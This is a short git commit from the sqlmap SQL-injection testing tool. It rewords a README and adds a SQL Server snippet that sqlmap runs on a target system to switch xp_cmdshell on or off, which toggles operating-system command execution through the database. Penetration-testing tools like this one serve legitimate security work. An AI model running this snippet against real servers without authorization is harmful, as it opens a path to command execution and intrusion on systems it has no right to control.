adding first code example for SPL snippets

This commit is contained in:
Miroslav Stampar 2012-02-15 13:17:01 +00:00
parent edeb4b6113
commit 9059d30312
4 changed files with 23 additions and 7 deletions

View file

@ -1,3 +1,3 @@
Files in this folder represent SQL stored procedure declarations used
Files in this folder represent SQL Procedural Language snippets used
by sqlmap on the target system. They are licensed under the terms of
the GNU Lesser General Public License.

View file

@ -0,0 +1,6 @@
EXEC master..sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC master..sp_configure 'xp_cmdshell', %ENABLE%;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE WITH OVERRIDE;